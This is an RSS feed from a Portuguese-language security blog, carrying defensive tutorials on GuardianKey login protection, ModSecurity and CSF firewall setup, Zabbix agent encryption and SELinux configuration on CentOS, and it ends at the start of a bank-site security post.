<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Segurança da Informação Archives - Blog do Gesiel Bernardes</title>
	<atom:link href="https://gesielbernardes.eti.br/category/seguranca-da-informacao/feed" rel="self" type="application/rss+xml" />
	<link>https://gesielbernardes.eti.br/category/seguranca-da-informacao</link>
	<description>Blog sobre Tecnologia e Segurança da Informação</description>
	<lastBuildDate>Thu, 25 Jul 2019 17:18:46 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9</generator>
	<item>
		<title>Plugin GuardianKey para SSH</title>
		<link>https://gesielbernardes.eti.br/plugin-guardiankey-para-ssh.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Thu, 25 Jul 2019 17:15:02 +0000</pubDate>
				<category><![CDATA[Gerência de Redes]]></category>
		<category><![CDATA[guardiankey]]></category>
		<category><![CDATA[Segurança da Informação]]></category>
		<category><![CDATA[GuardianKey]]></category>
		<category><![CDATA[segurança da informação]]></category>
		<category><![CDATA[ssh]]></category>
		<guid isPermaLink="false">http://gesielbernardes.eti.br/?p=258</guid>

					<description><![CDATA[<p>Mais um reforço para segurança do SSH! GuardianKey é um sistema que utiliza IA (Inteligência Artificial) para prover mais segurança em operações de &#8220;login&#8221;. Ele utiliza dados contextuais, dados de threat intelligence, entre outros, para verificar se o usuário é quem diz ser. Ou seja: Mesmo que o usuário tenha a senha comprometida, o sistema… <span class="read-more"><a href="https://gesielbernardes.eti.br/plugin-guardiankey-para-ssh.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/plugin-guardiankey-para-ssh.html">Plugin GuardianKey para SSH</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Mais um reforço para segurança do SSH!</p>



<p>GuardianKey é um sistema que utiliza IA (Inteligência Artificial) para prover mais segurança em operações de &#8220;login&#8221;. Ele utiliza dados contextuais, dados de threat intelligence, entre outros, para verificar se o usuário é quem diz ser.  Ou seja: Mesmo que o usuário tenha a senha comprometida, o sistema analisará se o perfil de quem está acessando coincide com o padrão utilizado, caso não ele pode enviar alerta para o usuário/administrador ou até bloquear o acesso.</p>



<p>Aqui no blog já postei sobre o<a href="https://gesielbernardes.eti.br/integrando-o-zabbix-com-o-guardiankey.html"> plugin para Zabbix</a>. Recentemente, eles lançaram plugin para esse tipo de análise para o serviço de SSH. Basta instalar o pacote (via yum ou apt), fazer o registro, colocar as informações de registro no arquivo de configuração (/etc/guardiankey/gk.conf), iniciar o serviço e pronto, o serviço já estará funcional. </p>



<p>Saiba mais nos links abaixo:</p>



<ul class="wp-block-list"><li><a href="https://guardiankey.io">Página do GuardianKey</a></li><li><a href="https://guardiankey.io/pt-br/products/guardiankey-for-ssh/">Página do Plugin SSH</a></li><li><a href="https://github.com/pauloangelo/guardiankey-ssh">Plugin SSH do GuardianKey no Github</a></li></ul>



<p></p>
<p>The post <a href="https://gesielbernardes.eti.br/plugin-guardiankey-para-ssh.html">Plugin GuardianKey para SSH</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Integrando o Zabbix com o GuardianKey</title>
		<link>https://gesielbernardes.eti.br/integrando-o-zabbix-com-o-guardiankey.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Sun, 28 Apr 2019 16:58:15 +0000</pubDate>
				<category><![CDATA[Gerência de Redes]]></category>
		<category><![CDATA[guardiankey]]></category>
		<category><![CDATA[Segurança da Informação]]></category>
		<category><![CDATA[Zabbix]]></category>
		<category><![CDATA[autenticação segura]]></category>
		<category><![CDATA[GuardianKey]]></category>
		<category><![CDATA[segurança da informação]]></category>
		<guid isPermaLink="false">http://gesielbernardes.eti.br/?p=248</guid>

					<description><![CDATA[<p>Neste post irei mostrar como implantar os serviços do GuardianKey em uma instalação do Zabbix. O GuardianKey é um serviço que protege a autenticação do sistema (nesse caso o Zabbix) usando técnicas de Machine Learning, e incrementa recursos valiosos contra acessos não autorizados. Farei um post mais detalhado sobre ele futuramente. Nessa implementação irei abordar… <span class="read-more"><a href="https://gesielbernardes.eti.br/integrando-o-zabbix-com-o-guardiankey.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/integrando-o-zabbix-com-o-guardiankey.html">Integrando o Zabbix com o GuardianKey</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Neste post irei mostrar como implantar os serviços do GuardianKey em uma instalação do Zabbix.</p>



<p>O <a href="https://guardiankey.io">GuardianKey</a> é um serviço que protege a autenticação do sistema (nesse caso o Zabbix) usando técnicas de Machine Learning, e incrementa recursos valiosos contra acessos não autorizados. Farei um post mais detalhado sobre ele futuramente. Nessa implementação irei abordar a utilização do GuardianKey Security Auth Lite, que é gratuito até 10 usuários. Mais detalhes em:  <a href="https://guardiankey.io/pt-br/services/guardiankey-auth-security-lite/">https://guardiankey.io/pt-br/services/guardiankey-auth-security-lite/</a> .</p>



<h3 class="wp-block-heading">Instalação do Plugin</h3>



<p>Basta fazer o download do plugin, e executa-lo na pasta de arquivos frontend do Zabbix (normalmente /usr/share/zabbix):<br /><br /># cd /usr/share/zabbix<br /># wget https://raw.githubusercontent.com/pauloangelo/guardiankey-plugin-zabbix/master/install.sh<br /><br /># sh install.sh</p>



<p>Por fim, você deve logar no <a href="https://panel.guardiankey.io">painel </a>do GuardianKey para configurar: Envio de e-mails, notificar os usuários, etc. Você pode ter informações detalhadas do painel do GuardianKey no link:  <br /><a href="https://guardiankey.io/pt-br/documentation/panel-documentation/">https://guardiankey.io/pt-br/documentation/panel-documentation/</a> <br /><br /><br /><br /></p>



<p></p>



<p></p>
<p>The post <a href="https://gesielbernardes.eti.br/integrando-o-zabbix-com-o-guardiankey.html">Integrando o Zabbix com o GuardianKey</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Instalando ModSecurity no CentOS 7 (com Apache)</title>
		<link>https://gesielbernardes.eti.br/instalando-modsecurity-no-centos-7.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Wed, 01 Nov 2017 01:40:11 +0000</pubDate>
				<category><![CDATA[Segurança da Informação]]></category>
		<category><![CDATA[Web]]></category>
		<guid isPermaLink="false">http://gesielbernardes.eti.br/?p=213</guid>

					<description><![CDATA[<p>    ModSecurity é um firewall de aplicação web (WAF) open source, mantido pela  Trustwave Labs. Ele aumenta consideravelmente a segurança do ambiente Web, protegendo o ambiente contra ataques mais comuns, como SQL Injection, XSS, entre outros. Nesse post iremos abordar a instalação do ModSecurity no CentOS 7 com Apache/ Pré-requisitos: # yum install httpd… <span class="read-more"><a href="https://gesielbernardes.eti.br/instalando-modsecurity-no-centos-7.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/instalando-modsecurity-no-centos-7.html">Instalando ModSecurity no CentOS 7 (com Apache)</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">    ModSecurity é um firewall de aplicação web (WAF) open source, mantido pela  Trustwave Labs. Ele aumenta consideravelmente a segurança do ambiente Web, protegendo o ambiente contra ataques mais comuns, como SQL Injection, XSS, entre outros. Nesse post iremos abordar a instalação do ModSecurity no CentOS 7 com Apache/</span></p>
<h4>Pré-requisitos:</h4>
<p># yum install httpd epel-release git wget</p>
<h4>Instalação do ModSecurity</h4>
<p># yum install mod_security mod_evasive</p>
<p>Instalação das regras:</p>
<p># cd /etc/httpd/modsecurity.d<br />
# rm -rf activated_rules/<br />
#  git clone https://github.com/SpiderLabs/owasp-modsecurity-crs .<br />
# mv crs-setup.conf.example crs-setup.conf<br />
# vi /etc/httpd/conf.d/mod_security.conf<br />
Altere a linha 4 para:<br />
IncludeOptional modsecurity.d/rules/*.conf</p>
<p># vi /etc/httpd/modsecurity.d/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf<br />
Comente (coloque # no inicio da linha) da linha 37 (SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/&#8230;) até a linha 64( setvar:tx.%{rule.id}&#8230;), e depois comente da linha 751 até a 779.</p>
<p># vi /etc/httpd/modsecurity.d/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf<br />
Comente da linha 43 até a 68</p>
<p>Reinicie o Apache:<br />
# systemctl restart httpd</p>
<p>Observação: A configuração padrão vem com o nível &#8220;paranoico&#8221; 1, ou seja, irá fornecer uma proteção básica porém irá gerar muito pouco ou quase nenhum falso positivo. Em minha opinião, o nível &#8220;paranoico&#8221; 2 tem uma relação custo-benefício melhor, uma vez que oferece um nível maior de proteção com uma quantidade aceitável de falso positivo. Para alterar para o nível paranoico 2, faça a seguinte alteração:</p>
<p># vi /etc/httpd/modsecurity.d/crs-setup.conf<br />
(linha 171)<br />
SecAction \<br />
&#8220;id:900000,\<br />
phase:1,\<br />
nolog,\<br />
pass,\<br />
t:none,\<br />
setvar:tx.paranoia_level=2&#8221;</p>
<p>Agora reinicie o serviço:<br />
# systemctl restart httpd</p>
<p>The post <a href="https://gesielbernardes.eti.br/instalando-modsecurity-no-centos-7.html">Instalando ModSecurity no CentOS 7 (com Apache)</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Instalando Config Server Firewall (CSF) no Centos 7</title>
		<link>https://gesielbernardes.eti.br/instalando-csf-no-centos7.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Mon, 16 Oct 2017 13:13:53 +0000</pubDate>
				<category><![CDATA[Segurança da Informação]]></category>
		<guid isPermaLink="false">http://gesielbernardes.eti.br/?p=209</guid>

					<description><![CDATA[<p>O CSF é uma aplicação que gerencia regras de firewall. Além da funcionalidade básica de um firewall, o CSF inclui outros recursos de segurança, como detecção de login/intrusão/inundação. Ele é capaz de reconhecer muitos ataques, como varreduras de portas, inundações SYN e ataques de força bruta em muitos serviços. Iremos abordar a instalação do CSF no… <span class="read-more"><a href="https://gesielbernardes.eti.br/instalando-csf-no-centos7.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/instalando-csf-no-centos7.html">Instalando Config Server Firewall (CSF) no Centos 7</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">O CSF é uma aplicação que gerencia regras de firewall. Além da funcionalidade básica de um firewall, o CSF inclui outros recursos de segurança, como detecção de login/intrusão/inundação. Ele é capaz de reconhecer muitos ataques, como varreduras de portas, inundações SYN e ataques de força bruta em muitos serviços. Iremos abordar a instalação do CSF no CentOS 7.</span></p>
<h2><span style="font-weight: 400;">Instalação no CentOS 7:</span></h2>
<p><span style="font-weight: 400;"># yum install wget vim perl-libwww-perl.noarch perl-Time-HiRes</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># cd /usr/src/</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># wget </span><a href="https://download.configserver.com/csf.tgz"><span style="font-weight: 400;">https://download.configserver.com/csf.tgz</span><span style="font-weight: 400;"><br />
</span></a><span style="font-weight: 400;"># tar -xzf csf.tgz</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># cd csf</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># sh install.sh</span></p>
<p><span style="font-weight: 400;">Testando a instalação:</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># cd /usr/local/csf/bin/</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># perl csftest.pl</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">Resultado esperado:<br />
{&#8230;}</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">RESULT: csf should function on this server</span></p>
<h2>Configurando o CSF</h2>
<p><span style="font-weight: 400;"># vi /etc/csf/csf.conf</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">TESTING = &#8220;0&#8221;</span></p>
<p><span style="font-weight: 400;"># systemctl start csf</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># systemctl start lfd</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># systemctl enable csf</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># systemctl enable lfd</span></p>
<p><span style="font-weight: 400;">Você pode listar as regras digitando:</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"># csf -l</span></p>
<p>&nbsp;</p>
<p>The post <a href="https://gesielbernardes.eti.br/instalando-csf-no-centos7.html">Instalando Config Server Firewall (CSF) no Centos 7</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Configurando Criptografia do Zabbix no Windows</title>
		<link>https://gesielbernardes.eti.br/configurando-criptografia-do-agente-zabbix-no-windows.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Fri, 06 May 2016 18:50:08 +0000</pubDate>
				<category><![CDATA[Gerência de Redes]]></category>
		<category><![CDATA[Segurança da Informação]]></category>
		<guid isPermaLink="false">http://gesielbernardes.eti.br/?p=154</guid>

					<description><![CDATA[<p>Neste post abordarei a configuração da Criptografia do Zabbix no Windows. O agente para Windows disponível na página de downloads do Zabbix não possui suporte a criptografia habilitado.  Uma alternativa seria compilar o agente para Windows com suporte a criptografia. Todavia, encontrei nesta página do site do Zabbix agentes compilados com criptografia habilitada. Então, vamos lá: Faça o… <span class="read-more"><a href="https://gesielbernardes.eti.br/configurando-criptografia-do-agente-zabbix-no-windows.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/configurando-criptografia-do-agente-zabbix-no-windows.html">Configurando Criptografia do Zabbix no Windows</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Neste post abordarei a configuração da Criptografia do Zabbix no Windows.<br />
O agente para Windows disponível na página de downloads do Zabbix não possui suporte a criptografia habilitado.  Uma alternativa seria compilar o agente para Windows com suporte a criptografia. Todavia, encontrei <a href="https://support.zabbix.com/browse/ZBXNEXT-3047" target="_blank">nesta página</a> do site do Zabbix agentes compilados com criptografia habilitada. Então, vamos lá:</p>
<ol>
<li>Faça o download do agente de acordo com sua arquitetura:<br />
x86:  https://support.zabbix.com/secure/attachment/40104/Zabbix-3.0.1-with-OpenSSL-1.0.2c-x86.zip<br />
x64: https://support.zabbix.com/secure/attachment/40105/Zabbix-3.0.1-with-OpenSSL-1.0.2f-x64.zip</li>
<li>Extraia o arquivo na pasta que deseja a instalação (ex: C:\zabbix)</li>
<li>Crie o arquivo de configuração (ex: c:\zabbix\zabbix_agentd.conf), e adicione na configuração as opções relacionadas a criptografia (PSK ou Certificados). Você pode conferir <a href="https://gesielbernardes.eti.br/criptografia-no-zabbix.html" target="_blank">neste post</a> as configurações de criptografia do Agente, e <a href="https://www.zabbix.com/documentation/3.0/pt/manual/appendix/config/zabbix_agentd_win">nesta página</a> você encontra todas as opções de configuração do Agente.</li>
<li>Instale o serviço do Zabbix. Neste exemplo, minha instalação está na pasta C:\zabbix:<br />
Abra o cmd (como Administrador) e digite:<br />
C:\zabbix\zabbix_agentd -i -c &#8220;C:\zabbix\zabbix_agentd.conf&#8221;</li>
</ol>
<p>E pronto! A instalação com suporte a TLS está feita&#8230;.</p>
<p>The post <a href="https://gesielbernardes.eti.br/configurando-criptografia-do-agente-zabbix-no-windows.html">Configurando Criptografia do Zabbix no Windows</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Configurar e trabalhar com SELinux (CentOS)</title>
		<link>https://gesielbernardes.eti.br/configurar-selinux.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Mon, 15 Feb 2016 12:11:51 +0000</pubDate>
				<category><![CDATA[Segurança da Informação]]></category>
		<category><![CDATA[configurar selinux]]></category>
		<category><![CDATA[desabilitar selinux]]></category>
		<category><![CDATA[disable selinux]]></category>
		<category><![CDATA[selinux]]></category>
		<category><![CDATA[selinux centos]]></category>
		<guid isPermaLink="false">http://gesielbernardes.eti.br/?p=116</guid>

					<description><![CDATA[<p>O SELinux é uma importante camada de proteção para os servidores Linux. Infelizmente, é muito comum &#8211; e até corriqueiro &#8211; os administradores de servidores desabilitarem ele, sem saber o quão importante ele é para a segurança do sistema. Este artigo é um resumo de uma série que escrevi para o CSIRT Unicamp (links no… <span class="read-more"><a href="https://gesielbernardes.eti.br/configurar-selinux.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/configurar-selinux.html">Configurar e trabalhar com SELinux (CentOS)</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>O SELinux é uma importante camada de proteção para os servidores Linux. Infelizmente, é muito comum &#8211; e até corriqueiro &#8211; os administradores de servidores desabilitarem ele, sem saber o quão importante ele é para a segurança do sistema. Este artigo é um resumo de uma série que escrevi para o <a href="https://www.security.unicamp.br" target="_blank">CSIRT Unicamp </a>(links no final da página).</p>
<h2>Introdução ao SELinux</h2>
<p>Mesmo sendo conhecido por grande parte dos administradores de redes/sistemas, o uso mais comum consiste basicamente em “desabilitá-lo”. Por requerer um trabalho adicional, ou por não saber configurar o SELinux, ou por outros motivos, os administradores abrem mão de um importante aliado na proteção do servidor. Segundo estatísticas do CSIRT Unicamp, ao menos 70% dos problemas de Segurança em servidores web no ano de 2013 poderiam ter sido evitados se estivessem com SELinux ativo.</p>
<p>SELinux é a implantação do mecanismo de Segurança MAC (Mandatory Access Control) no kernel do Linux. Foi criado pela NSA (National Security Agency), e impõe regras em arquivos e processos em um sistema Linux.<br />
A maioria dos sistemas utilizam DAC ( Discretionary Access Control) para prover segurança do sistema. De uma forma geral, DAC é um controle de acesso em que o usuário tem controle total dos arquivos que possui e executa. Uma vez definida estas permissões, não há nenhuma outra restrição para execução dos processos/arquivos. Isto pode ser um problema quando, por exemplo, o usuário (ou um processo iniciado pelo mesmo) não atribui a permissão adequada a um determinado arquivo, deixando-o exposto. Ou então quando um programa foge do seu comportamento “normal”. Vejamos um exemplo: O usuário apache está sendo utilizado para executar o software Apache. Durante sua execução, devido uma falha de programação no código da página, o processo recebe uma requisição para acessar o arquivo /etc/passwd. As permissões do arquivo são as seguintes:</p>
<p># ls -l /etc/passwd<br />
-rw-r&#8211;r&#8211; 1 root root 1760 Out 23 11:12 /etc/passwd</p>
<p>Segundo as permissões do arquivo /etc/passwd, todos podem ler o arquivo. Logo, o Apache poderá exibi-lo sem nenhum problema. Ainda neste exemplo, se a falha do código da página permitisse, seria possível o Apache salvar um arquivo em qualquer local que tiver permissão de escrita.<br />
Mandatory Access Control (MAC), provido pelo SELinux, restringe o nível de controle que os usuários tem sobre os objetos que eles criam, e adiciona categorias e rótulos a todos os objetos do sistema de arquivos. Usuários e processos devem ter acesso adequado a estas categorias e rótulos para que então possam interagir com esses objetos. Quando corretamente implementado, MAC permite ao sistema defender-se adequadamente. A sua capacidade de limitar os privilégios associados a processos de execução limita o âmbito de dano potencial, que pode resultar da exploração de vulnerabilidades em aplicações e serviços do sistema.<br />
Como aplicação do SELinux, o que se tem são rótulos contendo informações relevantes para a segurança de processos e arquivos. Essa informação é chamada de Contexto SELinux (SELinux context), e pode ser obtida utilizando a opção “-Z” no comando “ls”:</p>
<p># ls -lZ /etc/passwd<br />
-rw-r&#8211;r&#8211;. root root system_u:object_r:etc_t:s0 /etc/passwd</p>
<p>No arquivo acima temos o contexto do usuário (system_u), a regra (object_r), o tipo (etc_t) e o nível (s0). Estas informações são utilizadas para determinar o acesso do usuário ao arquivo. Agora, vamos voltar ao exemplo anterior, e considerar que neste sistema o SELinux está ativo. Verificaremos então o contexto do processo do Apache:</p>
<p># ps axZ | grep httpd<br />
unconfined_u:system_r:httpd_t:s0 6906 ? Ss 0:00 /usr/sbin/httpd</p>
<p>Logo, como o contexto do processo não coincide com o contexto do arquivo, o acesso ao mesmo será NEGADO, mesmo que nas permissões DAC o mesmo tenha permissão para tanto.</p>
<h2>Modificando contextos</h2>
<p>Conforme visto anteriormente, o SELinux tem seu funcionamento baseado em rótulos e em políticas de segurança. Os rótulos dos usuários, arquivos e processos definem o contexto de segurança de cada objeto. Colocando em uma aplicação prática, vejamos o exemplo a seguir:</p>
<p># ls -Z /var/www/html/<br />
-rw-r&#8212;&#8211;. root apache unconfined_u:object_r:user_home_t:s0 index.html</p>
<p>Em quase todos os casos, o campo do contexto que realmente importa é o terceiro campo; ele indica o tipo do objeto (neste caso, user_home_t indica que o tipo de arquivo é um arquivo de usuário “humano”). Considerando que este arquivo é uma página que será utilizada pelo Apache, conclui-se que ele não está com o contexto apropriado (que neste caso seria “httpd_sys_content_t”), logo não irá funcionar. Então, é necessário alterar o tipo de arquivo no contexto para que o mesmo funcione:</p>
<p># chcon -R -t httpd_sys_content_t /var/www/html/</p>
<p>Assim como o chmod é utilizado para alterar permissões DAC, o chcon pode ser utilizado para alterar o contexto dos arquivos. Porém todas as alterações realizadas com o chcon são desfeitas quando o sistema é reiniciado. Para que a alteração seja permanente, deve-se utilizar o semanage:</p>
<p># semanage fcontext -m -t httpd_sys_content_t /var/www/html/index.html</p>
<p>Alterar o contexto de arquivo por arquivo não parece ser muito produtivo. Por isso, você pode utilizar expressões regulares para alterar vários arquivos de uma vez só:</p>
<p># semanage fcontext -m -t httpd_sys_content_t &#8220;/var/www/html(/.*)?&#8221;</p>
<p>Se o retorno que você tiver for o abaixo, basta você trocar o “-m” (modificar) pelo “-a” (adicionar) no comando:</p>
<p>usr/sbin/semanage: O contexto de arquivo para /var/www/html não está definido</p>
<p># semanage fcontext -a -t httpd_sys_content_t &#8220;/var/www/html(/.*)?&#8221;</p>
<p>Após realizar as alterações com o semanage, é necessário utilizar o “restorecon” para aplicar as alterações:</p>
<p># restorecon -Rv /var/www/html</p>
<p>Agora, o arquivo já está com o contexto que permitirá seu funcionamento:</p>
<p># ls -Z /var/www/html/<br />
-rwxr-x&#8212;. root apache unconfined_u:object_r:httpd_sys_content_t:s0 index.html</p>
<h2>Políticas Booleanas</h2>
<p>Além do contexto, o SELinux utiliza políticas pré-definidas para cada serviço para restringir/conceder acesso á determinadas funções. Você pode visualiza-las utilizando o comando abaixo:</p>
<p># semanage boolean -l</p>
<p>Supondo que desejo que o home dos usuários seja acessível pelo apache (crio lá no home do usuário uma pasta public_html para o usuário acessar meusite.com/~usuario). Se não alterar nada, o SELinux irá bloquear o acesso. Então, listando as políticas, temos:</p>
<p># semanage boolean -l | grep -E &#8216;httpd.*home&#8217;<br />
httpd_enable_homedirs (desativado,desativado) Allow httpd to read home directories</p>
<p>Com isso, confirmamos que a esta opção está desativada. Vamos ativá-la então:</p>
<p># setsebool -P httpd_enable_homedirs 1</p>
<h2>Liberar Portas</h2>
<p>O SELinux também provê controle sobre qual serviço pode acessar qual porta (para o desespero de alguns). A lista de portas/serviços liberados você pode obter com o comando abaixo:</p>
<p># semanage port -l</p>
<p>Usando como exemplo um servidor apache, que quero que o mesmo funcione na porta 25000/TCP. Porém, nas políticas SELinux esta porta não está liberada:</p>
<p># semanage port -l | grep http _port<br />
http_port_t tcp 80, 81, 443, 488, 8008, 8009, 8443, 9000</p>
<p>Então, vamos adicionar a porta 25000 á regra:</p>
<p># semanage port -a -t http_port_t -p tcp 25000</p>
<h2>Resolvendo problemas</h2>
<p><strong>     </strong>Muitas vezes, por diversas razões, não conseguimos impedir que o SELinux interfira no funcionamento adequado de determinados softwares. Para solucionar casos deste tipo, podemos utilizar o audit2allow para entender melhor o problema ou para criar módulos de políticas para SELinux.</p>
<p>O primeiro passo é verificar os logs em /var/log/audit,log, que terá registros semelhantes a esse:</p>
<p>type=AVC msg=audit(1455199601.283:181376): avc: denied { setattr } for pid=7489 comm=&#8221;mingetty&#8221; name=&#8221;tty6&#8243; dev=devtmpfs ino=5354 scontext=system_u:system_r:getty_t:s0 tcontext=system_u:object_r:tmpfs_t:s0 tclass=chr_file<br />
type=SYSCALL msg=audit(1455199601.283:181376): arch=c000003e syscall=92 success=no exit=-13 a0=7ffdf8b4b090 a1=0 a2=0 a3=7ffdf8b4acd0 items=0 ppid=1 pid=7489 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=&#8221;mingetty&#8221; exe=&#8221;/sbin/mingetty&#8221; subj=system_u:system_r:getty_t:s0 key=(null)<br />
type=AVC msg=audit(1455199606.148:181377): avc: denied { setattr } for pid=7490 comm=&#8221;mingetty&#8221; name=&#8221;tty2&#8243; dev=devtmpfs ino=5350 scontext=system_u:system_r:getty_t:s0 tcontext=system_u:object_r:tmpfs_t:s0 tclass=chr_file</p>
<p>Neste exemplo, SELinux está bloqueando a função &#8220;setattr&#8221; para a aplicação &#8220;mingetty&#8221;. Iremos usar o audit2allow para criar um módulo de política SELinux para corrigir tal erros.</p>
<p>Para gerar um relatórios &#8220;humano&#8221; dos eventos do SELinux, você pode utilizar o comando abaixo:<br />
# audit2allow -a</p>
<p>O comando acima irá analisar todos os registros contidos em /var/log/audit.log. Caso queira uma análise apenas para um erro específico, você pode usar o &#8220;grep&#8221; para filtrar os eventos:<br />
# grep &#8220;mingetty&#8221; /var/log/audit.log | allow2audit -w</p>
<p>Para criar um modulo de política SELinux, utilze a opção &#8220;-M&#8221;:<br />
# audit2allow -a -M meumodulo</p>
<p>Posso também utilizar o &#8220;grep&#8221;, como no exemplo anterior:<br />
# grep &#8220;mingetty&#8221; /var/log/audit.log | allow2audit -M meumodulo</p>
<p>Ele irá criar um arquivo &#8220;.pp&#8221; e um .&#8221;te&#8221; no diretório corrente. Para instalar o módulo, você utilize o comando:<br />
# semodule -i meumodulo.pp</p>
<p>Em seguinda, habilite o módulo:<br />
# semodule -e meumodulo</p>
<h2>Referências:</h2>
<p><a href="https://www.security.unicamp.br/54-selinux-um-importante-aliado-na-seguranca-de-servidores-linux-parte-1.html" target="_blank">https://www.security.unicamp.br/54-selinux-um-importante-aliado-na-seguranca-de-servidores-linux-parte-1.html</a></p>
<p><a href="https://www.security.unicamp.br/86-selinux-um-importante-aliado-na-seguranca-de-servidores-linux-parte-2.html" target="_blank">https://www.security.unicamp.br/86-selinux-um-importante-aliado-na-seguranca-de-servidores-linux-parte-2.html</a></p>
<p><a href="https://www.security.unicamp.br/103-selinux-um-importante-aliado-na-seguranca-de-servidores-linux-parte-3.html" target="_blank">https://www.security.unicamp.br/103-selinux-um-importante-aliado-na-seguranca-de-servidores-linux-parte-3.html</a></p>
<p>The post <a href="https://gesielbernardes.eti.br/configurar-selinux.html">Configurar e trabalhar com SELinux (CentOS)</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Segurança em Sites de Bancos: Suas informações estão seguras?</title>
		<link>https://gesielbernardes.eti.br/seguranca-em-sites-de-bancos-suas-informacoes-estao-seguras.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Wed, 21 Oct 2015 18:37:47 +0000</pubDate>
				<category><![CDATA[Segurança da Informação]]></category>
		<category><![CDATA[internet banking]]></category>
		<category><![CDATA[internet segura]]></category>
		<category><![CDATA[segurança da informação]]></category>
		<category><![CDATA[segurança de bancos]]></category>
		<guid isPermaLink="false">http://gesielbernardes.eti.br/?p=103</guid>

					<description><![CDATA[<p>Uma recente pesquisa realizada pelo Prof. Diego Aranha (veja aqui) mostrou que a maioria dos aplicativos bancários possuíam deficiência de segurança, que podiam ser exploradas por meio de um ataque MITM (man in the middle).  Mas e os Sites bancários?  Será a segurança em sites de Bancos melhor que nos aplicativos? Parece que não. Utilizando… <span class="read-more"><a href="https://gesielbernardes.eti.br/seguranca-em-sites-de-bancos-suas-informacoes-estao-seguras.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/seguranca-em-sites-de-bancos-suas-informacoes-estao-seguras.html">Segurança em Sites de Bancos: Suas informações estão seguras?</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
